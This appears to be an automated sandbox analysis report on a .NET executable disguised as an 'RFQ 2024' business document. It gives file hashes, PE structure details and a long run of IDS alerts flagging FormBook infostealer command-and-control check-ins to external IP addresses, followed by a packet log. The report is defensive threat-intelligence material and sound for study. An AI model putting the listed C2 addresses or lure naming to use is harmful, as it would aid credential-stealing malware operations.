Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d

C:\Users\user\AppData\Local\Temp\Um65m294

Download File

Process:	C:\Windows\SysWOW64\write.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.1142956103012707
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
MD5:	E3F9717F45BF5FFD0A761794A10A5BB5
SHA1:	EBD823E350F725F29A7DE7971CD35D8C9A5616CC
SHA-256:	D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
SHA-512:	F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.750622629514149
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
File size:	878'592 bytes
MD5:	53770b8b5cd580ee1e3d41f7f1eea3ca
SHA1:	09680223785a08879a89c2bab84c6883eb851a41
SHA256:	834d4e9657f33ca5bea5956050e5188ecd53b8a2fcad2b6136dc60f83619691a
SHA512:	d5259d7abac81b64355bda41d573b98842eccc36e5d2c577fbd375fbcb97d6043b07764de68c4132f591149a1c69df641261448f47967a0f53d159269e80e817
SSDEEP:	24576:So+HZJ1A/1xQlP3/r3HZf82ZTCJ3V9d8Rolki1TETcE5n:aH1AgN6uG9colJTin
TLSH:	7115020C7BA66D62C69C9F37C4131044C2B3C491E16AF36A55DE3DF25E72B61C48EE62
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..g.................R...........q... ........@.. ....................................@................................

File Icon


Icon Hash:	41a400a4a4000000

Static PE Info

General

Entrypoint:	0x4d710e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67070D30 [Wed Oct 9 23:09:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd70b8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd8000	0x1200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xda000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd5114	0xd5200	e1e0096a7346ff56971620125f627cbe	False	0.8829052877565983	SysEx File -	7.757882678113778	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd8000	0x1200	0x1200	9099c25270ad6632e6d3b611b2e3fb7e	False	0.65234375	data	6.696637479902879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xda000	0xc	0x200	fab986a1982d273e50dcfda25f60eeec	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xd80c8	0xcee	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.7616314199395771
RT_GROUP_ICON	0xd8dc8	0x14	data	1.05
RT_VERSION	0xd8dec	0x36c	data	0.4417808219178082

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-11T09:59:32.283365+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49890	65.21.196.90	80	TCP
2024-10-11T09:59:32.283365+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49861	76.223.54.146	80	TCP
2024-10-11T10:00:35.277880+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49818	3.33.130.190	80	TCP
2024-10-11T10:00:55.773219+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49819	75.2.103.23	80	TCP
2024-10-11T10:00:58.409243+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49820	75.2.103.23	80	TCP
2024-10-11T10:01:01.052052+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49821	75.2.103.23	80	TCP
2024-10-11T10:01:03.691246+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49822	75.2.103.23	80	TCP
2024-10-11T10:01:09.353742+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49823	161.97.168.245	80	TCP
2024-10-11T10:01:12.072207+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49824	161.97.168.245	80	TCP
2024-10-11T10:01:14.961548+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49825	161.97.168.245	80	TCP
2024-10-11T10:01:17.592879+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49826	161.97.168.245	80	TCP
2024-10-11T10:01:23.442550+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49827	65.21.196.90	80	TCP
2024-10-11T10:01:26.208699+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49828	65.21.196.90	80	TCP
2024-10-11T10:01:28.917926+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49829	65.21.196.90	80	TCP
2024-10-11T10:01:31.644581+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49830	65.21.196.90	80	TCP
2024-10-11T10:01:52.727953+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49835	91.212.26.5	80	TCP
2024-10-11T10:01:55.435186+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49836	91.212.26.5	80	TCP
2024-10-11T10:01:58.136177+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49837	91.212.26.5	80	TCP
2024-10-11T10:02:00.836243+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49838	91.212.26.5	80	TCP
2024-10-11T10:02:06.154795+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49839	3.33.130.190	80	TCP
2024-10-11T10:02:09.697567+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49840	3.33.130.190	80	TCP
2024-10-11T10:02:11.424776+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49841	3.33.130.190	80	TCP
2024-10-11T10:02:14.990437+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49842	3.33.130.190	80	TCP
2024-10-11T10:02:20.703290+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49843	154.23.184.194	80	TCP
2024-10-11T10:02:23.532170+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49844	154.23.184.194	80	TCP
2024-10-11T10:02:26.358729+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49845	154.23.184.194	80	TCP
2024-10-11T10:02:29.183801+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49846	154.23.184.194	80	TCP
2024-10-11T10:02:34.653450+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49847	63.250.47.57	80	TCP
2024-10-11T10:02:37.332906+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49848	63.250.47.57	80	TCP
2024-10-11T10:02:40.027583+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49849	63.250.47.57	80	TCP
2024-10-11T10:02:42.719623+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49850	63.250.47.57	80	TCP
2024-10-11T10:02:48.475974+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49851	172.67.220.57	80	TCP
2024-10-11T10:02:51.124931+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49852	172.67.220.57	80	TCP
2024-10-11T10:02:53.744492+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49853	172.67.220.57	80	TCP
2024-10-11T10:02:56.351030+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49854	172.67.220.57	80	TCP
2024-10-11T10:03:02.658779+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49855	68.66.226.116	80	TCP
2024-10-11T10:03:05.334660+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49856	68.66.226.116	80	TCP
2024-10-11T10:03:08.064235+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49857	68.66.226.116	80	TCP
2024-10-11T10:03:10.149686+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49858	68.66.226.116	80	TCP
2024-10-11T10:03:15.480307+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49859	76.223.54.146	80	TCP
2024-10-11T10:03:18.116647+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49860	76.223.54.146	80	TCP
2024-10-11T10:03:23.395049+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49862	76.223.54.146	80	TCP
2024-10-11T10:03:28.716241+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49863	15.197.148.33	80	TCP
2024-10-11T10:03:32.758698+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49864	15.197.148.33	80	TCP
2024-10-11T10:03:33.986833+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49865	15.197.148.33	80	TCP
2024-10-11T10:03:37.530714+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49866	15.197.148.33	80	TCP
2024-10-11T10:03:43.775100+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49867	15.197.148.33	80	TCP
2024-10-11T10:03:45.483332+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49868	15.197.148.33	80	TCP
2024-10-11T10:03:48.126941+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49869	15.197.148.33	80	TCP
2024-10-11T10:03:51.673474+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49870	15.197.148.33	80	TCP
2024-10-11T10:03:57.922511+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49871	15.197.148.33	80	TCP
2024-10-11T10:03:59.637772+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49872	15.197.148.33	80	TCP
2024-10-11T10:04:03.186563+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49873	15.197.148.33	80	TCP
2024-10-11T10:04:11.865115+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49874	15.197.148.33	80	TCP
2024-10-11T10:04:17.196234+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49875	15.197.148.33	80	TCP
2024-10-11T10:04:20.737161+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49876	15.197.148.33	80	TCP
2024-10-11T10:04:22.458612+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49877	15.197.148.33	80	TCP
2024-10-11T10:04:26.019091+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49878	15.197.148.33	80	TCP
2024-10-11T10:04:34.312776+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49879	3.33.130.190	80	TCP
2024-10-11T10:04:39.533867+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49880	75.2.103.23	80	TCP
2024-10-11T10:04:42.172571+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49881	75.2.103.23	80	TCP
2024-10-11T10:04:44.822433+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49882	75.2.103.23	80	TCP
2024-10-11T10:04:47.455367+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49883	75.2.103.23	80	TCP
2024-10-11T10:04:52.824165+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49884	161.97.168.245	80	TCP
2024-10-11T10:04:55.534451+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49885	161.97.168.245	80	TCP
2024-10-11T10:04:58.241985+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49886	161.97.168.245	80	TCP
2024-10-11T10:05:00.936209+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49887	161.97.168.245	80	TCP
2024-10-11T10:05:06.333622+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49888	65.21.196.90	80	TCP
2024-10-11T10:05:09.083768+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49889	65.21.196.90	80	TCP
2024-10-11T10:05:14.537873+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49891	65.21.196.90	80	TCP
2024-10-11T10:05:33.432587+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49896	91.212.26.5	80	TCP
2024-10-11T10:05:36.142901+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49897	91.212.26.5	80	TCP
2024-10-11T10:05:38.854707+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49898	91.212.26.5	80	TCP
2024-10-11T10:05:41.553278+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49899	91.212.26.5	80	TCP
2024-10-11T10:05:48.182063+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49900	3.33.130.190	80	TCP
2024-10-11T10:05:49.409638+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49901	3.33.130.190	80	TCP
2024-10-11T10:05:52.943286+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49902	3.33.130.190	80	TCP
2024-10-11T10:05:54.695887+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49903	3.33.130.190	80	TCP
2024-10-11T10:06:00.311613+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49904	154.23.184.194	80	TCP
2024-10-11T10:06:03.140270+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49905	154.23.184.194	80	TCP
2024-10-11T10:06:05.967461+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49906	154.23.184.194	80	TCP
2024-10-11T10:06:08.790913+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49907	154.23.184.194	80	TCP
2024-10-11T10:06:14.161092+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49908	63.250.47.57	80	TCP
2024-10-11T10:06:16.851835+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49909	63.250.47.57	80	TCP
2024-10-11T10:06:19.543548+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49910	63.250.47.57	80	TCP
2024-10-11T10:06:22.218102+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49911	63.250.47.57	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2024 10:00:35.067987919 CEST	49818	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:00:35.168441057 CEST	80	49818	3.33.130.190	192.168.11.20
Oct 11, 2024 10:00:35.168725014 CEST	49818	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:00:35.174676895 CEST	49818	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:00:35.275263071 CEST	80	49818	3.33.130.190	192.168.11.20
Oct 11, 2024 10:00:35.277471066 CEST	80	49818	3.33.130.190	192.168.11.20
Oct 11, 2024 10:00:35.277517080 CEST	80	49818	3.33.130.190	192.168.11.20
Oct 11, 2024 10:00:35.277879953 CEST	49818	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:00:35.280364037 CEST	49818	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:00:35.283500910 CEST	80	49818	3.33.130.190	192.168.11.20
Oct 11, 2024 10:00:35.283737898 CEST	49818	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:00:35.380619049 CEST	80	49818	3.33.130.190	192.168.11.20
Oct 11, 2024 10:00:55.563024044 CEST	49819	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:55.662951946 CEST	80	49819	75.2.103.23	192.168.11.20
Oct 11, 2024 10:00:55.663336992 CEST	49819	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:55.670958996 CEST	49819	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:55.770561934 CEST	80	49819	75.2.103.23	192.168.11.20
Oct 11, 2024 10:00:55.773003101 CEST	80	49819	75.2.103.23	192.168.11.20
Oct 11, 2024 10:00:55.773219109 CEST	49819	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:57.183640003 CEST	49819	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:57.283478975 CEST	80	49819	75.2.103.23	192.168.11.20
Oct 11, 2024 10:00:58.201047897 CEST	49820	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:58.300730944 CEST	80	49820	75.2.103.23	192.168.11.20
Oct 11, 2024 10:00:58.301007032 CEST	49820	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:58.308675051 CEST	49820	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:58.407958984 CEST	80	49820	75.2.103.23	192.168.11.20
Oct 11, 2024 10:00:58.409085989 CEST	80	49820	75.2.103.23	192.168.11.20
Oct 11, 2024 10:00:58.409243107 CEST	49820	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:59.823738098 CEST	49820	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:00:59.923723936 CEST	80	49820	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:00.841140985 CEST	49821	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:00.941478968 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:00.941720009 CEST	49821	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:00.949393988 CEST	49821	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:00.949491978 CEST	49821	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:01.049844027 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.049868107 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.049880981 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.049895048 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.050045013 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.050154924 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.050173998 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.051803112 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:01.052052021 CEST	49821	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:02.463771105 CEST	49821	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:02.564344883 CEST	80	49821	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:03.481153011 CEST	49822	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:03.581667900 CEST	80	49822	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:03.582068920 CEST	49822	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:03.587192059 CEST	49822	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:03.687464952 CEST	80	49822	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:03.690762997 CEST	80	49822	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:03.690834999 CEST	80	49822	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:03.691246033 CEST	49822	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:03.692964077 CEST	49822	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:03.698296070 CEST	80	49822	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:03.698628902 CEST	49822	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:01:03.793466091 CEST	80	49822	75.2.103.23	192.168.11.20
Oct 11, 2024 10:01:09.002356052 CEST	49823	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:09.173521042 CEST	80	49823	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:09.173952103 CEST	49823	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:09.181427002 CEST	49823	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:09.353365898 CEST	80	49823	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:09.353463888 CEST	80	49823	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:09.353528023 CEST	80	49823	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:09.353579998 CEST	80	49823	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:09.353741884 CEST	49823	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:09.353898048 CEST	49823	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:10.696196079 CEST	49823	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:11.714827061 CEST	49824	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:11.885946035 CEST	80	49824	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:11.886178017 CEST	49824	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:11.893918037 CEST	49824	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:12.071731091 CEST	80	49824	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:12.071983099 CEST	80	49824	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:12.072026968 CEST	80	49824	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:12.072062016 CEST	80	49824	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:12.072206974 CEST	49824	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:12.072207928 CEST	49824	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:13.398853064 CEST	49824	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:14.416296959 CEST	49825	80	192.168.11.20	161.97.168.245
